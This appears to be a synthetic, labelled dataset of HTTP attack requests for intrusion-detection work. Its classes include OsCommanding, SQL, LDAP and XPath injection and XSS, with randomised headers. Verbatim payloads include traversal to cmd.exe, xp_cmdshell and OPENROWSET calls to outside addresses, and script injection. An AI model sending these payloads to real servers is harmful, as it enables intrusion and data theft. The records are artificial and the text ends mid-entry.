GET /tnii1anqoser9eue/emndreqgo/fLT/odCGV9/Kllhia2drsasrlei/yGitasu/dj6HHNmh/l0/wPpGhx/aef/Lesss95ie/hhiltRreredeEmenpue.jpeg?hssl=1LiaiyrmPseacoeyhn&4otbrevwsCrzg=8&HA9KSskk5Aand-=467+or+++aOo5%2FEly%2Fuzdlw%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D028%5D++++or++20%3D&becoearc=l8GWTdV8N&Himg4Q0Brr=%3D2s+idhu&mdmaIC=859802464&lJIx=i%24+&5led=nuet8bC HTTP/1.1
Host: 20.73.110.118
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-kr, x-mac-turkish, utf-7, iso-8859-7
Accept-Encoding: 
Accept-Language: J-ettbi, un-et, rine7tee-t, tteR-tmcydhah, cdaheouc-jga74;q=0.3
Cache-Control: no-store
Client-ip: 179.215.232.111
Cookie: fevMaroyuh=3;3rereynqeegLs= ooctnhu;hreiepodd=ozrpa
Cookie2: $Version="988"
Date: Fri, 14 Aug 09 15:08:06 GMT
ETag: W/"r2AbaBUZcYbH-sHcVU8"
Expect: 100-continue
From: egyritN@etesgoUsht.it
If-Modified-Since: Mon, 30 Nov 09 06:24:18 GMT
If-Unmodified-Since: Sun, 13 Dec 09 20:57:57 UTC
If-Match: "GKeXE8uhsI9QuLqeb3-a"
If-None-Match: *
If-Range: "-9BPWH.4WlUwV-5q-HX2"
Max-Forwards: 8
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: ieer sfiotoe=ytcS
Range: 2-801463,7709-,5-5829
Referer: /mokTtte/lsoj/eOae/gebe.bin
TE: trailers
Trailer: Date
User-Agent: tGf5GGQ http://www.aieo.ch
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4726x3292
Via: 5.4 www.nhzio0eo.gif, 2.6 www.wfwftt.jpeg, i9i/1.1 www.toeOtt.js
Transfer-Encoding: dhce; idx1biho=ietT5Dtt
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49507
Start - Id: 43725
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.nAtlsatpt.gov
Connection: keep-alive
Accept: application/*;q=0.2, text/*;q=0.7, image/*
Accept-Charset: x-mac-cyrillic;q=0.6, isiri-3342, iso-8859-2, x-mac-arabic, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: n-axO3;q=0.7, 4n3-fikea;q=0.0
Cache-Control: max-stale=6169
Client-ip: 105.144.118.141
Cookie: tzddhpp7onteean=rg;eaoN1tdlh=75;@sY11bfck2GZ=eaeagp9ureaccepth;2tinqplqiTel=2116;bduMtt6ostG=ilwmh
Cookie2: $Version="378"
Date: Wed, 07 Mar 07 23:52:45 CET
ETag: W/"3BJWUYYJ2ACJTUS@l"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Mon, 26 Jan 09 15:58:05 GMT
If-Unmodified-Since: Sun, 29 May 05 24:17:33 GMT
If-Match: "6MjIJR6DEMj0ukCJPmRB"
If-None-Match: *
If-Range: Mon, 19 Dec 05 23:27:52 GMT
Max-Forwards: 224
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aXp0aTphM3RMaXJ0
Range: 7008-71
Referer: /2tsm.pl
TE: chunked,trailers,chunked;q=0.3
User-Agent: nleaoy5q
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: HTTP/6.5 www.ngmt.jpg:66
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 251.245.152.34
X-Serial-Number: 601406
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43725
Start - Id: 46750
class: XSS
GET /tdlWi/aNP5Bmuz@M8l/fgr@/oottdsaus7Sratf/odragorooo/e@7/suJbOSNu_s@wi/ettztyEi2d2veel5ihs/id5Bband/eQzxjWcZ/NeyaRs2d7tfsHhp1.php3?moana=hnsc&ss=r6Ujtsq HTTP/1.1
Host: www.dexcIeayse.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 61.53.20.32
Cookie: r5MNxp_Z=script alert(qpcwaa7eeehvjth.jtveke)script;8jreedqano=e>enaoht4rnr;16nfisfn=amtioptdp;fIceaL=0733219
Cookie2: $Version="993"
Date: Mon, 31 Dec 07 14:54:11 CET
ETag: W/"bIuZiFX8Fd7Kv7gLu2q"
Expect: 100-continue
From: Nbtsa@emewereOk.com
If-Modified-Since: Sat, 17 Mar 07 09:15:05 GMT
If-Unmodified-Since: Wed, 22 Aug 07 05:02:16 CET
If-Match: "-8YqFYmxrn5b3OG"
If-None-Match: *
If-Range: *
Max-Forwards: 402
MIME-Version: 5.5
Pragma: sgUfE='eae'
Authorization: Digest qop=auth-int
Referer: http://www.Etphaass.gov/rcfctx/8ts7ih/stqiymt/Citi.tar
Trailer: Pragma
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 9.2; ht-ze; rv:0.3.2) Gecko/98068074
UA-Disp: 8606,8749,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0200x693
Via: 1.6 145.22.96.253
Transfer-Encoding: lalui
Upgrade: PTikh/4.2, erb/4.4, rrit/9.0
Warning: 875 122.139.225.158:6258 "aai2etnlaMhefE" "Tue, 03 Mar 09 16:40:46 UTC"
X-Serial-Number: 6732905562
----: ------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46750
Start - Id: 37378
class: LdapInjection
GET /toebeos8DEl6yht/iickmanrg/_Sit/g8T8JCO/rCV@/niwJ8/rjene7rqiadSlosria.jsp?4S1uDRM=xqi&ntgat=85859432&beinnxp=%2B&ayiHyqahledNr40=H4ilmhaetnettdiy&lyfjchct=86&4mese4irriin=6639905&iZ=i%40alonuoydp5nod&se1tnspvy3dozea=GhSna&uaAbdaccaz=153498&PFtj6Fv-.YxK=o3nae0s&aMuTdtekmennsoO=tietlucnttgRr&p4oxi=tcX-DO&IihpaeieeQ=yg7W7%40vvH&aDhqosinzpioe=h HTTP/1.0
Host: 160.38.23.139
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: ehNlH)(&(objectClass  =    d93*)
Accept-Language: *
Cache-Control: max-stale
Client-ip: 98.165.130.171
Cookie: 8t42robq=iuSwunagr
Date: Sat, 22 Aug 09 08:33:43 GMT
Expect: ioma6w
From: rantutaO@slU8aeire.ch
If-Modified-Since: Sat, 13 Oct 07 20:29:36 UTC
If-Unmodified-Since: Fri, 23 Dec 05 10:17:58 UTC
If-Match: *
If-None-Match: "oP6k4HGzpi4KMWK"
If-Range: *
Max-Forwards: 6
MIME-Version: 7.0
Pragma: h='ag55'
Proxy-Authorization: NTLM cE1xbFZzSXJnb2V2N2FlYWVvb2FydG9qMjJMZDVnbjFxcg==
Authorization: Digest opaque="uiel"
Range: 059445-,841-
Referer: http://www.anzbeL.fr/N14h8msO/eEeoi.tar.gz
TE: trailers
User-Agent: Mozilla/6.9 (Windows; U; Windows NT 2.2; sN-oa; rv:9.0.0) Gecko/54436431
UA-OS: Windows 95
UA-Pixels: 5445x5018
Via: 1.8 191.79.172.220:205
Transfer-Encoding: gzip
Upgrade: oth/1.4, eoZf/2.8
X-Serial-Number: 71830
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37378
Start - Id: 38434
class: LdapInjection
GET /t6rmdl633ySjKPBsCUv3/vdivtNw/3rEHFclq4/ZdNIGEVN/admininputURrhEV/le7ygttoxlnziwha/eliaNxtrls/lsc5/au-Fx.asp?e84MIpRi=1xSMxT&Ahadityn1tes=bfsnv%29%28++++%7C+++%28agn%3D*%29&xjrsirj=sibstCGwnehki&gio=Eosx8u&deneoeSebe7obg=3708&ftivwoad9kcernl=scSOY2yUgt5x&lri5nigldmeyit=%3CsMlt&d2plospdoeaacy=eOSOOu&wrupevioEmgcrE=e%3Emucoa%3Athtpasswmn&ljerSzC=23838331&eeewl=a83 HTTP/1.1
Host: 53.171.101.9
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312;q=0.4, x-mac-korean, gb2312, x-mac-arabic;q=0.1
Accept-Encoding: gzip, compress;q=0.8, deflate, gzip;q=0.1, deflate
Accept-Language: a-gfuhfsd, ruedh-eo, Ae-uEm;q=0.8
Cache-Control: max-age=24
Client-ip: 37.157.72.85
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="91"
Date: Sat, 08 Nov 08 13:52:56 CET
ETag: W/"xtXrh_nP5gn7GdAL"
Expect: 100-continue
From: it2uy@ylrV.fr
If-Modified-Since: Thu, 07 Feb 08 07:53:51 GMT
If-Unmodified-Since: Thu, 10 Jul 08 13:09:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3456
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest username="aSaCs"
Range: -03,38-
Referer: http://www.zrDq.ch/tsosfOdx/ioh8uad/rh2Aones/rkxbtw/aeee.avi
TE: gzip
Trailer: If-Range
User-Agent: niAgq2hnrm/5.7
UA-CPU: 68000
UA-Disp: 471,4327,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 040x944
Via: HTTP/5.6 www.nfyinLsr.png:5088, FTP/6.0 www.hnaeu7si.tiff, vhoat/7.0 www.gsod.jpg
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38434
Start - Id: 41158
class: SqlInjection
GET /upgbtrrh/f4BNMAS6nr/hlTaiIndwootepseuain/seasaesomahu4m9/lLFGwiCYiCMljeOKwZ/arscrxetehe/tiC65LKeHlYAsEO/eatiet2.shtml?ycSone=exec++xp_cmdshell+%27bcp+++++%22select++++*++from++ofo%22++queryout+++pwdump.exe++++-c+++-Craw++++-Shackersip++++-Usa+++++-Ph8ck3r%27&hiioeOe8aest=75852549&awtamre6ogsBa=ahe5+etoIan2&hofilAe1ee=%40genlf%40boot.ini&nih6=n%2F7e%3Ast%28 HTTP/1.1
Host: 169.197.208.19
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 177.124.117.237
Date: Fri, 30 Mar 07 11:22:19 UTC
Expect: 100-continue
From: jrln@tnernm.biz
If-Modified-Since: Sat, 01 Nov 08 14:18:56 UTC
If-Unmodified-Since: Mon, 12 Mar 07 05:56:57 CET
If-Match: "bV_J1hfi.eJREC2hJE"
If-None-Match: "quO5x.ExDCNRoicCz5k"
Max-Forwards: 3887
Pragma: ier='v9'
Proxy-Authorization: nmtsns c9neqdtn=mecete
Authorization: NTLM dGVzdDdsb3hHcmNkeWFjZHQ4ZHF0c3RlaXhzY3NlczBmaW9kbQ==
Referer: /c4sdNsg.html
TE: gzip,trailers
User-Agent: eidehpare6w5eiqCotUm
Via: 0.3 www.i02ndtyd.jpg:95
Transfer-Encoding: deflate
Warning: 341 www.hatlzo.htm "y5wl" "Thu, 19 Jun 08 12:12:06 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41158
Start - Id: 42673
class: SqlInjection
GET /Nsdriy6yeneralif/teait40ie/ebhpcnsdlan/aNQCjFo7hvgldNStN50/dlotrogeoe0c0Cncmy/bum/Knph-2f/wd/g-2vUD5shCc0Mu..jpeg?Eno=0455681972&imtEixCch1HabLb=%3B++++select+++++*++from+++++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3Dnoascr%3Bpwd%3DfhrIiwnb%3BNetwork%3DDBMSSOCN%3BAddress%3D217.253.96.255%2C79989%3B%27%2C%27select+++*+from++Etot0ete6%27%29&rolnqloen=rusmowroo&avnsostsma2e=i_vNNJtjKAs&ro0s=5842535&h6=a24.eAyZVG&0oiddJys=+t&taHarjio=aoOo&stdyeeet=n6ehYjhAIG&munrsrrns3rcfr=906992757&oS9e74seoan2=6+l+%2BraA01nph-&xITKYhMQ=%26bsrir&jCOjSetchUew=uhb6o HTTP/1.0
Host: 15.179.77.133
Connection: 8eulh
Accept: audio/*, text/*
Accept-Charset: macintosh;q=0.0, x-mac-hebrew;q=0.9, iso-10646-ucs-2;q=0.3, iso-8859-4
Accept-Encoding: compress, identity, deflate;q=0.7, compress, gzip;q=0.2
Accept-Language: *;q=0.6
Cache-Control: min-fresh=3777
Client-ip: 39.26.252.173
Cookie: set1lo9iesqe2s=9005384813;yaEAegezlso=77957480;dtcmetaa=wonwmwma9non;in=ttTE;Vl1Fte=h<uf
Cookie2: $Version="0"
Date: Sun, 25 Oct 09 02:04:03 GMT
ETag: "ZrRp2eug-ZzMMIJybKLT"
Expect: itee
If-Modified-Since: Mon, 17 Sep 07 08:01:57 GMT
If-Unmodified-Since: Fri, 23 Feb 07 15:18:07 UTC
If-Match: "jULdndvovV6X@mq"
If-None-Match: "mgM3YBhDL8pYO.wlO"
If-Range: "smnc27za56MrM8nmBam"
Max-Forwards: 880
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM cmNva2FvcHNvaXdsbmVlYWVpaGV5dG1tcm1yb2g2bnRlMXJzc2pyZTk3
Authorization: Basic bGRuaXNhYVY6cmxUYw==
Range: 73002-0
Referer: http://www.91l8ieoi.fr/lailecI/t0eetud.js
TE: gzip,chunked
Trailer: Accept
User-Agent: inHIRGVyOY http://www.sH2en3e.cz
UA-CPU: PowerPC
UA-Disp: 414,7114,8
UA-OS: Windows 98
UA-Color: color32
Via: HTTP/7.4 www.Nc5uulo.js
Transfer-Encoding: identity
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 398 www.oest9ct.png:70 "Iwcjoteska" "Fri, 08 May 09 18:31:41 CET"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 328822
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42673
Start - Id: 42324
class: SqlInjection
GET /abMNa8mlIqzbst/as1n/childFaPK1FnOG-CYfI/Eon6iuekdca.dll?beopnt0a=services%28&mt1afetmihiu=aainserteofseeeW&fdpihOn11ie=47083184&eNadt=rriyeoezld&ah=eUWYUN&nt5a5obttwitn=%27+or+++id++++in+++%28+++select+++*+++from+++++user_db++%29&my7cavnen=371 HTTP/1.1
Host: 41.26.191.10
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3;q=0.2, us-ascii
Accept-Encoding: deflate;q=0.1, compress;q=0.0, identity;q=0.9, deflate;q=0.1
Accept-Language: *;q=0.5
Cache-Control: a=Il5iec9a
Client-ip: 64.206.153.107
Cookie: gl7oywwtw=etnmhturye;cghXnqntlftwv=eapassthruittxp_tf8E;43Cm0=@hoerro/h
Cookie2: $Version="8"
Date: Wed, 28 Oct 09 11:34:01 GMT
ETag: "Ksz6YAgeD1hO7Ki"
Expect: rlstreu=Tpet8sAn
From: vtsibh@nsti.biz
If-Modified-Since: Fri, 22 Oct 04 19:50:46 UTC
If-Unmodified-Since: Fri, 28 Nov 08 01:06:39 UTC
If-Match: "RYZ6ybnh5s_U.@o_Fx4"
If-None-Match: *
If-Range: "DQ9p_1YBE74Or.AazTG"
Max-Forwards: 8
MIME-Version: 1.1
Pragma: noo=gfqeAmf
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest cnonce="sli9ah"
Range: -8
Referer: http://ntlxiblu.fr/tYsuwfre/neLsDre/aSoluew/dh7dlnba.cgi
TE: chunked;q=0.6
Trailer: If-Match
User-Agent: neamaethdit
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: HTTP/9.8 www.mhes.jpeg, mtoeI/8.9 www.u8cnr.css:4, 2.0 152.63.68.33:20
Transfer-Encoding: identity
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 47.158.122.16
X-Serial-Number: 807714416153290560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42324
Start - Id: 42479
class: SqlInjection
GET /YL-ro2zgTJallH/5ufloss/uKH1WOyvmH0/uWOL/siaet/gvc/noc0ntnbtosoepf/gz4.js?lbbdcgonomy=%27%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F7644%2F**%2FFROM%2F**%2Fxrg%2F**%2FWHERE%2F**%2F%28%27%27%3D++%27+%2F**%2F&upriHoefTe=893633 HTTP/1.1
Host: www.e0amdist.net
Connection: dNEoaOe2
Accept: audio/x-wav, image/png
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, gzip;q=0.3
Accept-Language: ie-x, Iirior-Iictase
Cache-Control: no-cache
Client-ip: 89.45.12.136
Cookie: ehcfue=csrn
Cookie2: $Version="2"
Date: Thu, 20 Oct 05 08:57:44 GMT
ETag: "ucyTNdNZwmzBEzMRFjR"
Expect: slai
From: sheo@RafNi.uk
If-Modified-Since: Fri, 01 Jul 05 09:39:43 CET
If-Unmodified-Since: Mon, 24 Oct 05 17:34:19 CET
If-Match: "LvpkpfmUXkhlhxL6U"
If-None-Match: "yo2o7LlG6dr701a7PRs"
If-Range: "@1w-v_gqOO03ha-jWTQk"
Max-Forwards: 6
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: eptd iSea=snwne
Range: 7-59040
Referer: /tohbn1/eguf5n/nnldHEH/kAfege/Neim.avi
TE: deflate;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 0.2; es-ee; rv:3.7.6) Gecko/43285226
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: 0.0 22.250.138.153, 7.3 60.53.130.62:54854
Transfer-Encoding: E6w8; eg65hLga=aKA5wn
Upgrade: iaesee/7.3
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42479
Start - Id: 49138
class: XPathInjection
GET /e6eaRn9/tDI.VFjxI_NR..qQXBZO/lI_uU/imd5-7bAa/tBhFKyfgDl-qim_EJAf/nrNslul81_YLB/8-.07D.Gbgsoundsock_streamJPJz/stoImuso5relhg/Ydrop.-Zximginclude4EBM9/scXro/ie1hc.exe?nnsrutb=eiet&zcnglpmBVWM=rts+r%3Eehu&roahce423=5877+or+++mg%2FmInpmt%2FAaia%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D71%5D++or+31%3D&arG=shutdown%5CT HTTP/1.1
Host: 68.6.108.218:3544
Connection: E2tiw
Accept: */*
Accept-Charset: windows-1250;q=0.9, isiri-3342;q=0.4, iso-8859-15
Accept-Encoding: deflate, compress;q=0.3
Accept-Language: nA-iu;q=0.8
Cache-Control: no-transform
Client-ip: 97.222.173.73
Cookie: esedaRrGsrLeT=leee7|hrrc;40i=n;mltyFusraiscript9i
Cookie2: $Version="860"
Date: Tue, 08 Jun 04 03:26:08 GMT
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: hstr@4dfys6.de
If-Modified-Since: Fri, 01 Oct 04 23:08:06 CET
If-Unmodified-Since: Thu, 04 Mar 04 12:55:09 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM aXBhOWVraXQxZXJkckVhZXgwVE5hQXhwc3RzbHJ0b2VsZnN0b25jZWFv
Authorization: NTLM b2Jhc0RkQ3FlZHNuZWltZW50b2V0b2xvbjdlVG40ZXRzcnQ=
Range: 6-
Referer: http://www.nh9poe.fr/geee/ehTr.msf
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 0.3; fd-oe; rv:4.6.9) Gecko/27282349
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: HTTP/3.3 130.157.114.54, 4.7 www.eou5naU5.tiff:5411, 5.4 www.etneprt.tiff
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49138
Start - Id: 38843
class: LdapInjection
GET /4R-o.OmZqnUj7UCv/lyn956acq9OOc8SzqoM/wdeiiaEetj.msf?a6h2i=4928222370&yli5oyamastt=2useRaeaeoo%24uI%5B&laFgUYc=%250dneng%7C&yZc4SP4Dc=puenhtnlusme&eot7i3eae1BRleN=64%29%28%26%28objectClass%3DhxAl%29%28%7C%28sn+++%3D+uss%29%28cn%3Dent++++J*%29%29&erBrubhPyas=ii&aqg2dHoeiwOce=idlz7ncioh7Au+ HTTP/1.0
Host: 22.27.45.207
Connection: 1Z1di
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eIjata-tOmt, tdmikssf-mr
Cache-Control: min-fresh=3025
Client-ip: 247.197.51.53
Cookie: lseeyuiiwtptim=iri:sMns;HdGW1Sd=8072;w6dorennRn=sSvnifihlltii;eitYateccnWe=Ntvtcqelvns4i
Cookie2: $Version="98"
Date: Sat, 26 May 07 17:32:39 CET
ETag: W/"MCchZ@rU6f2cadf"
Expect: 100-continue
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Thu, 29 Apr 10 01:05:40 GMT
If-Unmodified-Since: Fri, 17 Jul 09 05:01:14 GMT
If-Match: "XH5-bSPYDo.7hPTVRj"
If-None-Match: "NJtkfLmi6WnH-YQI"
If-Range: *
Max-Forwards: 88
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="sSsd"
Authorization: Basic bHJuaGFkOmdvOTJlcQ==
Range: 334983-612045,3433-74,55-
Referer: http://Erlcs0q.net/ssl6n.js
TE: gzip;q=0.5,trailers
Trailer: Via
User-Agent: Mozilla/0.6 (X11; U; Open BSD i386 3.1; 5a-pa; rv:5.6.4) Gecko/53671187
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 072x4241
Via: u3m/2.7 177.139.86.159, 2.4 www.ddhknq.png
Transfer-Encoding: compress
Upgrade: 1to/8.7, hEen5n/0.3
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 465738
----: ----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38843
Start - Id: 46997
class: XSS
GET /1r/w.5MzfASz3xvCmk1/anhglsyc8l8ntamhinnl/d_5q-1MpL.tiff?hnxPomaaWt4z1ad=%3Cform%2Bname%3DT%3E%3Cselect%2Bname%3DerI4+++%3Ehttp%3A%2F%2Fwww.t.com%2Foefson%2F%3F%3C%2Fselect%3E%3C%2Fform+%3E HTTP/1.0
Host: 249.156.93.47
Connection: tPeo
Accept: text/*;q=0.4, application/*, video/*;q=0.3
Accept-Charset: iso-8859-5, iso-2022-kr;q=0.0, iso-2022-jp;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: ds-77Ss6nw;q=0.8
Cache-Control: only-if-cached
Client-ip: 0.51.121.220
Cookie: to=71106764;8feanotewugh=crfavuw;atYC1wauLf6A=9002;etqrI=0nbetweensprylDb)3sh;<b ;eirad4ae=cqnqQn
Cookie2: $Version="5"
Date: Wed, 01 Mar 06 01:06:06 CET
ETag: "o8HdQMwRnEl_XlX"
Expect: 3vtn=oa9Wm;sdoo2=dbcNoIu8
From: euvEspot@alae.cz
If-Modified-Since: Sat, 28 Feb 04 09:10:24 CET
If-Unmodified-Since: Sun, 23 Sep 07 04:05:18 CET
If-Match: "31y3tbGm0ffYRfQrxv"
If-None-Match: *
If-Range: Fri, 09 Oct 09 08:49:57 GMT
Max-Forwards: 395
MIME-Version: 0.5
Pragma: kmrrAwtf='etoO6bo0'
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic d29oT2U3dDplYUhlc3RJ
Range: 5-22964
Referer: http://raethad.ch/sRmoT/6wdttgr.conf
TE: trailers
Trailer: Upgrade
User-Agent: hpds0il (7p17Lxw@0; eT3w_Q407; e-yA53a43P)
UA-Disp: 0784,5825,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: 4.5 www.idqx3.shtml, 5.0 103.195.142.198, 1.1 www.atzoecF.gif
Transfer-Encoding: identity
Upgrade: 5ve/2.6, a1rbm/0.6
Warning: 544 www.ccrt.gif "oteAehiueo" "Fri, 15 Apr 05 23:43:34 GMT"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46997
Start - Id: 44363
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 122.77.83.49:80
Connection: keep-alive
Accept: application/zip, audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: min-fresh=65
Client-ip: 85.70.71.191
Cookie: aetisws4sriA=sjee vd8~m7;Nieth=n9mailrt;eW=xohrrhir;depoearnAwd9ii=cynsbgsound
Cookie2: $Version="4"
Date: Sun, 09 Dec 07 02:38:05 CET
ETag: "0sJ3U838L7y6r98kvw"
Expect: eont=ltkcnd;tS3s
From: ks7mao@6esnaehk.it
If-Modified-Since: Mon, 05 Apr 10 24:42:55 GMT
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: "py75KbBUOTkEBY-"
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 0
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: -126597,56874-704
Referer: http://uGlo.de/titoTe.conf
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/4.4 (compatible; Konqueror/0.4; Mac OS X; lSosdog; hrCke4Tm)
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.tmnw.png
Transfer-Encoding: Gcei
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44363
Start - Id: 37070
class: LdapInjection
GET /wbgVCLBGru.raBFJs2v/jeseDnmlaer/ovuTf7pT2kvXMFe69.php4?ieTetliho=in%29%28%26%28objectClass%3D++vg*%29 HTTP/1.1
Host: www.rupulopq4.de
Connection: XqgYb
Accept: video/quicktime;q=0.5
Accept-Charset: cp-936
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: sEnHP9iU='tgsh'
Client-ip: 206.144.26.20
Cookie: leesi4i3=3
Cookie2: $Version="214"
Date: Thu, 28 Apr 05 21:34:14 CET
ETag: W/"Kzo6hXv1PcdAEDWXUlNO"
Expect: 100-continue
From: eyLj@5eswrLbN.net
If-Modified-Since: Wed, 12 Aug 09 08:55:48 CET
If-Unmodified-Since: Mon, 16 Oct 06 04:34:39 CET
If-Match: "Ctj4XsFIpS@7X9GF41"
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Fri, 06 Aug 04 05:24:49 GMT
Max-Forwards: 18
MIME-Version: 4.7
Pragma: pi=sisqe6
Proxy-Authorization: NTLM Z3R4bTBncnJObmllYWVldGVhNDRDbzNzc290M2F5ZVJhOGhhcmVlZXRkdmM=
Authorization: Digest opaque="ihsuh"
Range: -61152
Referer: http://gonnaV.net/dvHz/sxefeEne/igqttru/soejsats/e7aF.tar
TE: chunked;q=0.2,deflate,gzip;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 4.5; iq-7l; rv:4.8.6) Gecko/14515552
UA-CPU: PowerPC
UA-Disp: 538,106,32
UA-OS: Windows 95
